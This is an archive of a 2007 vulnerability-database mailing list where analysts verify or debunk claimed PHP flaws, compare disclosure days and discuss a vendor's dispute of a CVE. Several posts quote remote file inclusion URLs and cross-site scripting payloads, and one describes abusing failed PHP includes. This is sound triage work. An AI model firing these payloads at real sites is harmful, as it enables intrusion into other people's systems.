Date: Tue, 13 Feb 2007 09:25:26 -0600
Subject: [VIM] false: paNews 2.0b4 < = RFi Vulnerabilities
Message-ID: <814b9d50702130725v12b826cdn56245088946880dc@mail.gmail.com>

Below is the code.

$base_dir = "";
$base_url = "";

if (!$IS_PANEWS) {
$IS_PANEWS = 1;

include_once($base_dir . "config.php");
include_once($base_dir . "includes/database.php");
include_once($base_dir . "includes/functions.php");
$mysql->connect();

extract($_GET);

###############################

There are a few extract calls in multiple of the scripts that are used but the current one shouldn't be vulnerable.

phpinfo disclosure placed in the code. Got to love it.

if ($action == "login") {
$done = $auth->login();
} else if ($action == "logoff") {
$auth->logoff();
} else if (md5($action) == "8e31d9de70421ac6d33b50887b523a5b") {
// This is for the phparena staff. It is simply for debugging purposes.
// If you do not like the idea of this being here... Simply remove:
// 8e31d9de70421ac6d33b50887b523a5b from above.
phpinfo();
exit;
}

/str0ke

##################################################################
#paNews 2.0b4 < = RFi Vulnerabilities
#
#Download : http://phparena.net/files/officialdloads/panews/panews_20b4.zip
#
#Script Name : paNews
#V.Code in : [path]/viewnews.php
#
#
# include_once($base_dir . "config.php");
# include_once($base_dir . "includes/database.php");
# include_once($base_dir . "includes/functions.php");
#Exploit : www.target.com/path/viewnews.php?base_dir=[shell]

From heinbockel at mitre.org Tue Feb 13 10:29:03 2007
From: heinbockel at mitre.org (Heinbockel, Bill)
Date: Tue, 13 Feb 2007 10:29:03 -0500
Subject: [VIM] Some bl4ck Advisories are site-specific
Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC0195F0C3@IMCSRV5.MITRE.ORG>

Yesterday, the researcher bl4ck (Black Zero) posted several BUGTRAQ issues for XSS vulnerabilities. Some of these (maybe all) appear to be site-specific issues, including:

BUGTRAQ:20070209 XSS in eWay
BUGTRAQ:20070210 XSS in JBoss Portal
BUGTRAQ:20070209 XSS in lighttpd

I have verified that the lighttpd product is not vulnerable to XSS, and have not found any evidence supporting XSS flaws in the others.

Anyone else have any luck?

William Heinbockel
Infosec Engineer
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615

From heinbockel at mitre.org Tue Feb 13 10:32:47 2007
From: heinbockel at mitre.org (Heinbockel, Bill)
Date: Tue, 13 Feb 2007 10:32:47 -0500
Subject: [VIM] Verified: dot in Miniwebsvr 0.0.6
Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC0195F0C5@IMCSRV5.MITRE.ORG>

Research: bl4ck
BUGTRAQ:20070211 Miniwebsvr 0.0.6 - Directory traversal

In src/server.c (lines 221-229):

// Check for sub-root hacking, If found send a forbidden.
if (strstr(filename,"../")!=NULL)
{
strlcat(inst->logbuffer," ;",SERVER_BUFFER_SIZE);
setHeader_respval(inst,403); // Forbidden
printHeader(inst,headeronly,Buffer,SEND_BUFFER_SIZE); // No need to read
goto serverquit;
}

So only a directory traversal of .. will work.

William Heinbockel
Infosec Engineer
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615

From coley at linus.mitre.org Tue Feb 13 13:26:54 2007
From: coley at linus.mitre.org (Steven M.
Christey)
Date: Tue, 13 Feb 2007 13:26:54 -0500 (EST)
Subject: [VIM] true: Inertia News Remote File İnclude
In-Reply-To:
References:
Message-ID:

On Tue, 13 Feb 2007, Gadi Evron wrote:

> On Tue, 13 Feb 2007, str0ke wrote:
> > This was posted up on 12/21/2006.
> >
> > http://www.milw0rm.com/exploits/2976
>
> Any guidelines you want us to follow then when we test stuff and share?

I would think that as long as there's enough information to allow someone else to replicate your findings, that's sufficient. E.g. in this thread it was useful to know this was disclosed on milw0rm a while ago because we might be able to avoid creating a duplicate.

- Steve

From ge at linuxbox.org Tue Feb 13 14:55:32 2007
From: ge at linuxbox.org (Gadi Evron)
Date: Tue, 13 Feb 2007 13:55:32 -0600 (CST)
Subject: [VIM] true: Inertia News Remote File İnclude
In-Reply-To:
Message-ID:

On Tue, 13 Feb 2007, Steven M. Christey wrote:
>
> On Tue, 13 Feb 2007, Gadi Evron wrote:
>
> > On Tue, 13 Feb 2007, str0ke wrote:
> > > This was posted up on 12/21/2006.
> > >
> > > http://www.milw0rm.com/exploits/2976
> >
> > Any guidelines you want us to follow then when we test stuff and share?
>
> I would think that as long as there's enough information to allow someone
> else to replicate your findings, that's sufficient. E.g. in this thread
> it was useful to know this was disclosed on milw0rm a while ago because we
> might be able to avoid creating a duplicate.

Gotcha. Thanks!

>
> - Steve
>

From str0ke at milw0rm.com Tue Feb 13 17:14:54 2007
From: str0ke at milw0rm.com (str0ke)
Date: Tue, 13 Feb 2007 16:14:54 -0600
Subject: [VIM] false: Tell A Friend Script 2.8 Remote File Include Vulnerability
Message-ID: <814b9d50702131414w24d1af84x5db7207eb140e4cf@mail.gmail.com>

The script template.ext.class.inc.php only contains a class that is never used.

/str0ke

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Tell A Friend Script 2.8 Remote File Include Vulnerability
*
http://www.stadtaus.com/en/php_scripts/tell_a_friend_script/download_tell_a_friend_script.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

function set_include_path($path) {
$this->include_path = $path;

*
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:
*
inc/template.ext.class.inc.php?path=http://shell.txt?
*
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
**************************************************************************************************

From coley at mitre.org Tue Feb 13 20:40:19 2007
From: coley at mitre.org (Steven M. Christey)
Date: Tue, 13 Feb 2007 20:40:19 -0500 (EST)
Subject: [VIM] Tuesday flood
Message-ID: <200702140140.l1E1eJRl011310@faron.mitre.org>

Wow... Microsoft, Adobe, Cisco, Sun, and HP-UX all releasing multi-issue advisories on the same day? Ouch. This kind of pattern can't be good for sysadmins.

- Steve

From ge at linuxbox.org Tue Feb 13 20:41:36 2007
From: ge at linuxbox.org (Gadi Evron)
Date: Tue, 13 Feb 2007 19:41:36 -0600 (CST)
Subject: [VIM] Tuesday flood
In-Reply-To: <200702140140.l1E1eJRl011310@faron.mitre.org>
Message-ID:

On Tue, 13 Feb 2007, Steven M. Christey wrote:
>
> Wow... Microsoft, Adobe, Cisco, Sun, and HP-UX all releasing
> multi-issue advisories on the same day? Ouch. This kind of pattern
> can't be good for sysadmins.

Agreed, but should other vendors care if Microsoft releases on a certain day? Maybe for their client-base, but...

Crazy day.

>
> - Steve
>

From coley at mitre.org Wed Feb 14 02:32:22 2007
From: coley at mitre.org (Steven M.
Christey) Date: Wed, 14 Feb 2007 02:32:22 -0500 (EST) Subject: [VIM] false: old Develooping Flash Chat RFI Message-ID: <200702140732.l1E7WMct015257@faron.mitre.org> Researcher: SpC-x Ref: Develooping Flash Chat (banned_file) Remote File Inclusion http://archives.neohapsis.com/archives/bugtraq/2006-06/0317.html Claimed exploit: http://www.target.com/path/chat/adminips.php?banned_file=CmdShell Source inspection of versions 1.2, 1.5, and 1.6.5, as downloaded from www.vclcomponents.com, showed the following code: require ('required/config.php'); $banned_file = "required/banned_ip.txt"; if (($name==$admin_name) and ($password==$admin_password)){ $lines = file($banned_file); config.php had nothing but variable declarations. - Steve From aviram at beyondsecurity.com Wed Feb 14 03:50:13 2007 From: aviram at beyondsecurity.com (Aviram Jenik) Date: Wed, 14 Feb 2007 10:50:13 +0200 Subject: [VIM] Tuesday flood In-Reply-To: <200702140140.l1E1eJRl011310@faron.mitre.org> References: <200702140140.l1E1eJRl011310@faron.mitre.org> Message-ID: <200702141050.13755.aviram@beyondsecurity.com> On Wednesday 14 February 2007 03:40, Steven M. Christey wrote: > Wow... Microsoft, Adobe, Cisco, Sun, and HP-UX all releasing > multi-issue advisories on the same day? Ouch. This kind of pattern > can't be good for sysadmins. Absolutely. The reason seems pretty clear, though - if you're only contributing a bucket to an already existing flood there is much less bad PR for you. Especially if you piggy-back off Microsoft who will take most of the heat anyway. > > - Steve - Aviram From jericho at attrition.org Wed Feb 14 03:52:23 2007 From: jericho at attrition.org (security curmudgeon) Date: Wed, 14 Feb 2007 03:52:23 -0500 (EST) Subject: [VIM] Tuesday flood In-Reply-To: <200702141050.13755.aviram@beyondsecurity.com> References: <200702140140.l1E1eJRl011310@faron.mitre.org> <200702141050.13755.aviram@beyondsecurity.com> Message-ID: : On Wednesday 14 February 2007 03:40, Steven M. 
Christey wrote:
: > Wow... Microsoft, Adobe, Cisco, Sun, and HP-UX all releasing
: > multi-issue advisories on the same day? Ouch. This kind of pattern
: > can't be good for sysadmins.
:
: The reason seems pretty clear, though - if you're only contributing a
: bucket to an already existing flood there is much less bad PR for you.
: Especially if you piggy-back off Microsoft who will take most of the
: heat anyway.

Don't know about the rest of you, but I keep having this strong desire to whip up some graphics showing various 'storms' of vulnerability disclosures from the big vendors and pronouncing this as some 'perfect storm' of disclosure.

Al Pacino will star as Steve Christey, Christian Slater as Jericho.

From ge at linuxbox.org Wed Feb 14 07:28:39 2007
From: ge at linuxbox.org (Gadi Evron)
Date: Wed, 14 Feb 2007 06:28:39 -0600 (CST)
Subject: [VIM] Tuesday flood
In-Reply-To:
Message-ID:

On Wed, 14 Feb 2007, security curmudgeon wrote:
>
>
> : On Wednesday 14 February 2007 03:40, Steven M. Christey wrote:
> : > Wow... Microsoft, Adobe, Cisco, Sun, and HP-UX all releasing
> : > multi-issue advisories on the same day? Ouch. This kind of pattern
> : > can't be good for sysadmins.
> :
> : The reason seems pretty clear, though - if you're only contributing a
> : bucket to an already existing flood there is much less bad PR for you.
> : Especially if you piggy-back off Microsoft who will take most of the
> : heat anyway.
>
> Don't know about the rest of you, but I keep having this strong desire to
> whip up some graphics showing various 'storms' of vulnerability
> disclosures from the big vendors and pronouncing this as some 'perfect
> storm' of disclosure.
>
> Al Pacino will star as Steve Christey, Christian Slater as Jericho.
>

I fear who you will ask to play me.

From coley at mitre.org Wed Feb 14 13:56:49 2007
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 14 Feb 2007 13:56:49 -0500 (EST)
Subject: [VIM] false: old Jobline RFI
Message-ID: <200702141856.l1EIunE9023703@faron.mitre.org>

Researcher: SpC-x
Ref: BUGTRAQ Jobline 1 1 1 Version - Remote File Include Vulnerability
http://www.securityfocus.com/archive/1/archive/1/436990/30/4440/threaded

Vector: admin.jobline.php?mosConfig_absolute_path=[RFI]

admin.jobline.php in Jobline Component 1.1.1, as obtained from http://scripts.ringsworld.com/classified-ads/jobline-1-1-1/, starts off with:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

This product was released around October 2005, so if there's a vuln, it's in an older version.

- Steve

From coley at linus.mitre.org Wed Feb 14 19:31:20 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 14 Feb 2007 19:31:20 -0500 (EST)
Subject: [VIM] Tuesday flood
In-Reply-To:
References:
Message-ID:

On Wed, 14 Feb 2007, Gadi Evron wrote:

> On Wed, 14 Feb 2007, security curmudgeon wrote:
> >
> > disclosures from the big vendors and pronouncing this as some 'perfect
> > storm' of disclosure.
> >
> > Al Pacino will star as Steve Christey, Christian Slater as Jericho.
> >
>
> I fear who you will ask to play me.

Guest starring Gadi Evron as himself, of course! The DVD commentary by the director will be filled with veiled references to "tension on the set."

I like Brian's idea (perfect storm, brilliant!), and it feels like a pattern, but... does anybody have the data to figure this out automatically without manual data collection? CVE keeps the initial disclosure date and that's about it, so at best, we could only spot disclosures that came from vendor advisories. We don't record when each vendor actually released an advisory. Brian Krebs probably has some data on that, but only for a couple vendors.

On a semi-related note, I breezed through some CVE stats a day or two ago to see which days were most popular for disclosure, overall.
It used to be Wednesday, but the past couple years it's been Tuesday. Both Microsoft and Oracle release on Tuesdays, so that might be a part of the increase. Mozilla released on Tuesday in December and November, but Thursday in September and July. Apple does Tuesdays, but not all the time.

Friday, Saturday, and Sunday are always at the bottom of the list, in that order. I can dig 'em up if people are interested.

- Steve

From ge at linuxbox.org Wed Feb 14 20:10:51 2007
From: ge at linuxbox.org (Gadi Evron)
Date: Wed, 14 Feb 2007 19:10:51 -0600 (CST)
Subject: [VIM] Tuesday flood
In-Reply-To:
Message-ID:

On Wed, 14 Feb 2007, Steven M. Christey wrote:
>
> On Wed, 14 Feb 2007, Gadi Evron wrote:
>
> > On Wed, 14 Feb 2007, security curmudgeon wrote:
> > >
> > > disclosures from the big vendors and pronouncing this as some 'perfect
> > > storm' of disclosure.
> > >
> > > Al Pacino will star as Steve Christey, Christian Slater as Jericho.
> > >
> >
> > I fear who you will ask to play me.
>
> Guest starring Gadi Evron as himself, of course! The DVD commentary by
> the director will be filled with veiled references to "tension on the
> set."
>
> I like Brian's idea (perfect storm, brilliant!), and it feels like a
> pattern, but... does anybody have the data to figure this out
> automatically without manual data collection? CVE keeps the initial
> disclosure date and that's about it, so at best, we could only spot
> disclosures that came from vendor advisories. We don't record when each
> vendor actually released an advisory. Brian Krebs probably has some data
> on that, but only for a couple vendors.
>
> On a semi-related note, I breezed through some CVE stats a day or two ago
> to see which days were most popular for disclosure, overall. It used to
> be Wednesday, but the past couple years it's been Tuesday. Both Microsoft
> and Oracle release on Tuesdays, so that might be a part of the increase.
> Mozilla released on Tuesday in December and November, but Thursday in
> September and July. Apple does Tuesdays, but not all the time.
>
> Friday, Saturday, and Sunday are always at the bottom of the list, in that
> order. I can dig 'em up if people are interested.

Tuesday sounds like a great day to be honest. Not Monday, and most time until-end-of-week.

I believe maybe OSVDB (with some support we can pull for them together) or a new joint site can probably allocate release dates for vendors if they are to be responsible.

I have a feeling I can sell this to Microsoft.

>
> - Steve
>

From jericho at attrition.org Wed Feb 14 20:22:05 2007
From: jericho at attrition.org (security curmudgeon)
Date: Wed, 14 Feb 2007 20:22:05 -0500 (EST)
Subject: [VIM] Tuesday flood
In-Reply-To:
References:
Message-ID:

: I like Brian's idea (perfect storm, brilliant!), and it feels like a
: pattern, but... does anybody have the data to figure this out
: automatically without manual data collection? CVE keeps the initial
: disclosure date and that's about it, so at best, we could only spot
: disclosures that came from vendor advisories. We don't record when each
: vendor actually released an advisory. Brian Krebs probably has some
: data on that, but only for a couple vendors.

OSVDB tracks disclosure date, based on the vendor advisory. If the vendor advisory is for an issue already disclosed, we track the disclosure date based on the initial disclosure, not the advisory.

From coley at linus.mitre.org Thu Feb 15 00:45:45 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu, 15 Feb 2007 00:45:45 -0500 (EST)
Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay)
Message-ID:

Oh yeah, Gadi/Aviram - Brian and I have adopted an informal policy of stripping out vendor email addresses for disputes, since some might be private.

CVE has no opinion on this dispute.
- Steve

---------- Forwarded message ----------
Date: Thu, 15 Feb 2007 14:15:27 +1000
From: Kwik-Pay Support
To: cve at mitre.org
Subject: CVE-2006-1050 (under review)

It has just been brought to our attention that you have created this 'security problem' regarding our software. Why is it that no-one from your organisation contacted us prior to publishing that information or even since?

The kwikpay.mdb file supplied with kwikpay is a template for the database structure of user databases created by kwikpay and to store a demonstration payroll. It does not contain any sensitive user information.

When a user payroll database is opened, the encryption of the database is checked and if the database is not encrypted, the user is prompted to encrypt the database, but the choice is the customer's. Data in the database is intended to be accessible to the user for other applications such as Excel. It is entirely the user's choice as to whether they enforce security. The data belongs to them, not kwikpay.

Please update your notice to indicate that no problem exists.

Alastair Robertson

From sullo at cirt.net Thu Feb 15 00:49:20 2007
From: sullo at cirt.net (Sullo)
Date: Thu, 15 Feb 2007 00:49:20 -0500
Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay)
In-Reply-To:
References:
Message-ID: <45D3F460.8040800@cirt.net>

Steven M. Christey wrote:
> CVE has no opinion on this dispute.
>

CVE has none... but I bet Steve has a strong opinion :-)

From sullo at cirt.net Thu Feb 15 00:55:12 2007
From: sullo at cirt.net (Sullo)
Date: Thu, 15 Feb 2007 00:55:12 -0500
Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay)
In-Reply-To: <45D3F460.8040800@cirt.net>
References: <45D3F460.8040800@cirt.net>
Message-ID: <45D3F5C0.3090408@cirt.net>

Just to throw some more fuel on the fire:

http://www.kwik-pay.com/changehistory.php?Country=au

....
15 Mar 2006 - 4.2.22
Database not properly encrypted by version 4.2.21

10 Mar 2006 - 4.2.21
Add facility to encrypt and decrypt Kwik-Pay payroll databases
....

--
http://www.cirt.net/ | http://www.osvdb.org/

From aviram at beyondsecurity.com Thu Feb 15 04:01:30 2007
From: aviram at beyondsecurity.com (Aviram Jenik)
Date: Thu, 15 Feb 2007 11:01:30 +0200
Subject: [VIM] Tuesday flood
In-Reply-To:
References:
Message-ID: <200702151101.31485.aviram@beyondsecurity.com>

On Thursday 15 February 2007 02:31, Steven M. Christey wrote:
>
> I like Brian's idea (perfect storm, brilliant!), and it feels like a
> pattern, but... does anybody have the data to figure this out
> automatically without manual data collection?

At SecuriTeam we have the date OUR advisory was published, although it might be off by +-1 from the original depending on the timezone, the time we picked it up on the wire, additional time if we needed to verify it, etc. So if you're looking for days-of-the-week patterns I don't think it's very accurate, but if you're looking for days-of-month (or busiest period of the year) it might help establish a pattern.

There's an auto-generated page at:
http://www.securiteam.com/stats.html
that shows some examples.

>
> - Steve

- Aviram

From aviram at beyondsecurity.com Thu Feb 15 04:11:30 2007
From: aviram at beyondsecurity.com (Aviram Jenik)
Date: Thu, 15 Feb 2007 11:11:30 +0200
Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay)
In-Reply-To:
References:
Message-ID: <200702151111.30531.aviram@beyondsecurity.com>

On Thursday 15 February 2007 07:45, Steven M. Christey wrote:
> Oh yeah, Gadi/Aviram - Brian and I have adopted an informal policy of
> stripping out vendor email addresses for disputes, since some might be
> private.
>
> CVE has no opinion on this dispute.
Then "CVE" must have much more patience than I do :-)

Not sure how you resolve cases like this (when it's obvious the vendor is talking out of his ass) but what we usually do is add the vendor's response to the advisory - verbatim. This way the vendor gets his say, and his customers get to see how stupid he really is. Seems like a win-win to us.

>
> - Steve
>

- Aviram

From mjc at redhat.com Thu Feb 15 06:13:24 2007
From: mjc at redhat.com (Mark J Cox)
Date: Thu, 15 Feb 2007 11:13:24 +0000 (GMT)
Subject: [VIM] Tuesday flood
In-Reply-To:
References:
Message-ID:

> On a semi-related note, I breezed through some CVE stats a day or two ago
> to see which days were most popular for disclosure, overall.

For Red Hat security advisories in 2006 and date based on Eastern Time:

Sunday     0%
Monday     8%  ########
Tuesday   28%  ###########################
Wednesday 29%  ############################
Thursday  23%  #######################
Friday    11%  ###########
Saturday   1%  #

There was one issue pushed on Saturday (actually at the end of a long Friday, 16 minutes past midnight ET to correct a critical Firefox flaw).

These stats are partially under our control: we'll hold off pushing an advisory rated moderate or low severity even for public issues until a Tue/Wed/Thu. But for a critical rated public issue we'll push as soon as the update passes QA, no matter what day or time.

Mark

From aviram at beyondsecurity.com Thu Feb 15 09:44:40 2007
From: aviram at beyondsecurity.com (Aviram Jenik)
Date: Thu, 15 Feb 2007 16:44:40 +0200
Subject: [VIM] [OT] Beers in Virginia
Message-ID: <200702151644.41207.aviram@beyondsecurity.com>

Sorry to hijack the mailing list for totally irrelevant purposes, but I noticed that the DC/Virginia area has a lot of security experts and no organized meeting forum (at least, that I know of).
I know that several of the members of the list are from that area, and as for us - we have an office in McLean, which is normally populated by sales people but gets occasional visits from Noam, Gadi and myself once in a while.

I think it could be nice to arrange informal meetings for beers/steaks/coffee/pool/whatever with or without the pretense of talking about security problems and how to solve them. I'm thinking about a social gathering that gives a chance to put faces to emails.

If there's already a "club" that I don't know about, feel free to enlighten me (but let me know if they accept people like me - obviously I can't join if they do).

If not, here's a call for action: Next Friday, the 23rd at the Rock Bottom Brewery in Ballston Mall.

Possible alternatives: Any other day of the week next week, and any other beer or pool place in the Northern Virginia/DC/Maryland area.

Any takers?

(list managers: let me know if I'm completely out of line with this)

- Aviram

From jms at bughunter.ca Thu Feb 15 13:53:30 2007
From: jms at bughunter.ca (J. M. Seitz)
Date: Thu, 15 Feb 2007 10:53:30 -0800
Subject: [VIM] Sigh
Message-ID: <003901c75132$96703860$4d07a8c0@jseitz>

So, I would change "Grep n Gripe" to "Grep n Gripe Pipe mail".

JS

hey guys .. check out this new xss i just found ;P

Vulnerable : Calendar Express 2
web : http://www.ci.emeryville.ca.us/calendar, http://www.phplite.com/products/calendarexpress/

XSS :
http://127.0.0.1/calendar/search.php?allwords=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E&cid=1&title=1&desc=1

################################
Discovered By BLacK ZeRo
K.S.A
bL4ck at bsdmail.org
################################

Best regards ,,

hey guys ..
check out this new xss i just found ;P

Vulnerable : deskpro.com v1.1.0
web : http://www.deskpro.com, http://customers.qwk.net
Version : v1.1.0

XSS :
http://127.0.0.1/dp/faq.php?article=">

################################
Discovered By BLacK ZeRo
K.S.A
bL4ck at bsdmail.org
################################

Best regards ,,

From theall at tenablesecurity.com Thu Feb 15 15:40:31 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Thu, 15 Feb 2007 15:40:31 -0500
Subject: [VIM] RSSMini Exploit -- Probably Not
Message-ID: <45D4C53F.5080104@tenablesecurity.com>

This concerns :

I just grabbed the source for rssminifolder (http://rssmini.com/rssminifolder.zip). folder/index.php looks like this:

include("config.php"); ^M
...
^M

There's no config.php file by default in the folder directory so this will work if register_globals is enabled and someone just unzips a copy of the software under their document directory. However, to actually install it, you're supposed to copy the config.php file from folder's parent directory after editing it, and that has this line:

$url = "http://rssmini.com/demo5";^M

I see nowhere in either file where $url can be overwritten by user-supplied input.

The other files mentioned in the milw0rm posting behave the same as index.php, at least as far as the exploit is concerned.

So in sum, this only looks like a problem if someone hasn't installed the software and has register_globals enabled.

P.S: Hope I got it right this time, str0ke. :-)

George
--
theall at tenablesecurity.com

From theall at tenablesecurity.com Thu Feb 15 15:47:13 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Thu, 15 Feb 2007 15:47:13 -0500
Subject: [VIM] Drupal Preview Comments Remote Code Execution Vulnerability
Message-ID: <45D4C6D1.60601@tenablesecurity.com>

Sigh, looks like Security Focus just created BID 22579 for the Drupal exploits str0ke just wrote for the flaws already covered by BID 22306.

George
--
theall at tenablesecurity.com

From str0ke at milw0rm.com Thu Feb 15 15:47:48 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 15 Feb 2007 14:47:48 -0600
Subject: [VIM] RSSMini Exploit -- Probably Not
In-Reply-To: <45D4C53F.5080104@tenablesecurity.com>
References: <45D4C53F.5080104@tenablesecurity.com>
Message-ID: <814b9d50702151247r2751fe22w5f3f377d555d9857@mail.gmail.com>

Hey brotha,

You're correct, if they install the product correctly then it isn't vulnerable. Removing it from the exploits section.

/str0ke

On 2/15/07, George A. Theall wrote:
> This concerns :
>
> I just grabbed the source for rssminifolder
> (http://rssmini.com/rssminifolder.zip). folder/index.php looks like this:
>
> include("config.php"); ^M
> ...
> ^M
>
> There's no config.php file by default in the folder directory so this
> will work if register_globals is enabled and someone just unzips a copy
> of the software under their document directory. However, to actually
> install it, you're supposed to copy the config.php file from folder's
> parent directory after editing it, and that has this line:
>
> $url = "http://rssmini.com/demo5";^M
>
> I see nowhere in either file where $url can be overwritten by
> user-supplied input.
>
> The other files mentioned in the milw0rm posting behave the same as
> index.php, at least as far as the exploit is concerned.
>
> So in sum, this only looks like a problem if someone hasn't installed
> the software and has register_globals enabled.
>
> P.S: Hope I got it right this time, str0ke.
> :-)
>
> George
> --
> theall at tenablesecurity.com
>

From str0ke at milw0rm.com Thu Feb 15 15:56:47 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 15 Feb 2007 14:56:47 -0600
Subject: [VIM] Drupal Preview Comments Remote Code Execution Vulnerability
In-Reply-To: <45D4C6D1.60601@tenablesecurity.com>
References: <45D4C6D1.60601@tenablesecurity.com>
Message-ID: <814b9d50702151256w52b8fabi2f2b75321c164fa5@mail.gmail.com>

Hopefully they will also update the files with the latest version as well, since the current version on the webpage doesn't work correctly.

/str0ke

On 2/15/07, George A. Theall wrote:
> Sigh, looks like Security Focus just created BID 22579 for the Drupal
> exploits str0ke just wrote for the flaws already covered by BID 22306.
>
> George
> --
> theall at tenablesecurity.com
>

From str0ke at milw0rm.com Thu Feb 15 16:09:17 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 15 Feb 2007 15:09:17 -0600
Subject: [VIM] [milw0rm] exploit 3305
Message-ID: <814b9d50702151309q518310dcg93e4460481a0932c@mail.gmail.com>

Seems the author crazy sent in the vulnerability around 2 days after sn0oPy. So sn0oPy has been credited with the discovery.

http://milw0rm.com/exploits/3305
this exploit is credited to sn0oPy (me)

http://securityreason.com/securityalert/2232
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2007-02/msg00133.html
http://lists.virus.org/bugtraq/msg00127.html
http://www.securityfocus.com/archive/1/459655

From rkeith at securityfocus.com Thu Feb 15 15:55:19 2007
From: rkeith at securityfocus.com (rkeith at securityfocus.com)
Date: Thu, 15 Feb 2007 13:55:19 -0700 (MST)
Subject: [VIM] re Drupal Preview Comments Remote Code Execution Vulnerability (fwd)
Message-ID:

Quite right, an error on our part. The respective BIDs are being corrected. Thanks for the heads up George.

The files are also being updated, thanks str0ke.
--
Rob Keith
Symantec

---------- Forwarded message ----------
Date: Thu, 15 Feb 2007 14:56:47 -0600
From: str0ke
Reply-To: Vulnerability Information Managers
To: Vulnerability Information Managers
Subject: Re: [VIM] Drupal Preview Comments Remote Code Execution Vulnerability

Hopefully they will also update the files with the latest version as well, since the current version on the webpage doesn't work correctly.

/str0ke

On 2/15/07, George A. Theall wrote:
> Sigh, looks like Security Focus just created BID 22579 for the Drupal
> exploits str0ke just wrote for the flaws already covered by BID 22306.
>
> George
> --
> theall at tenablesecurity.com
>

From coley at linus.mitre.org Thu Feb 15 17:23:42 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu, 15 Feb 2007 17:23:42 -0500 (EST)
Subject: [VIM] RSSMini Exploit -- Probably Not
In-Reply-To: <45D4C53F.5080104@tenablesecurity.com>
References: <45D4C53F.5080104@tenablesecurity.com>
Message-ID:

On Thu, 15 Feb 2007, George A. Theall wrote:

>
> include("config.php"); ^M
> ...
> ^M
>
> There's no config.php file by default in the folder directory so this
> will work if register_globals is enabled and someone just unzips a copy
> of the software under their document directory.

Oh. My. God.

I can't believe this... the application doesn't exit on a failed include? I just tested this and it's true, but... wow.

Oh wait, I see - require() will trigger a fatal exit. OK. I didn't know about this feature of PHP.

But - there's a whole bunch of vulnerabilities waiting to be found that rely on this behavior, 'cause I bet a bunch of PHP programmers don't really understand this. Is it protected against traversal and RFI, but uses user input? Fine, just use an invalid value, trigger a failed include, and related variables become yours.

Ya learn something new every day.

- Steve

From coley at mitre.org Thu Feb 15 17:43:29 2007
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 15 Feb 2007 17:43:29 -0500 (EST)
Subject: [VIM] affected versions for old MySQL ALTER TABLE (CVE-2004-0835)
Message-ID: <200702152243.l1FMhTIL011851@faron.mitre.org>

It was brought to my attention that CVE-2004-0835 lists a variety of affected versions, but many other vdb's only list one or two.

The narrower version range was probably inherited from some Linux distro that only supported one or two release trees. Debian released an advisory on Oct 11, 2004 and Red Hat released one on the 20th, and both of these only covered 3.23; later advisories added more versions.

It took a bit of digging, but I found some other proof that it affects more than 3.23:

http://www.mysql.org/doc/refman/4.1/en/news-4-0-19.html
http://www.mysql.org/doc/refman/4.1/en/news-4-1-2.html

Just search for "CVE-2004-0835"

It was *not* listed in the 5.0.1 changelog, however, and I'm not exactly sure where we got that from for the CVE description.

- Steve

From coley at linus.mitre.org Thu Feb 15 18:51:46 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu, 15 Feb 2007 18:51:46 -0500 (EST)
Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay)
In-Reply-To: <200702151111.30531.aviram@beyondsecurity.com>
References: <200702151111.30531.aviram@beyondsecurity.com>
Message-ID:

Well, I just got another email from the developer asking me to remove the X-Force item that was apparently deleted (which we won't, because of historical reasons, not to mention that the dispute is still pending), and to change the description because it doesn't match what SECUNIA:19075 says. But it says "The security issue has been confirmed in version 4.2.20... Update to version 4.2.22." Which sure sounds to me like there used to be an issue and now there isn't. Does anybody know of a changelog entry?

I eagerly await their reply.

By the way - does anybody record retracted disputes?
We have "* DISPUTED *" in the description only while the dispute is active, but I know we've had a number of retractions.

- Steve

From steve at vitriol.net Thu Feb 15 19:01:40 2007
From: steve at vitriol.net (Steve Tornio)
Date: Thu, 15 Feb 2007 18:01:40 -0600
Subject: [VIM] Vendor dispute - CVE-2006-1050 (Kwik-Pay)
In-Reply-To:
References: <200702151111.30531.aviram@beyondsecurity.com>
Message-ID: <45D4F464.8070303@vitriol.net>

Steven M. Christey wrote:
> Well, I just got another email from the developer asking me to remove the
> X-Force item that was apparently deleted (which we won't, because of
> historical reasons, not to mention that the dispute is still pending), and
> to change the description because it doesn't match what SECUNIA:19075
> says. But it says "The security issue has been confirmed in version
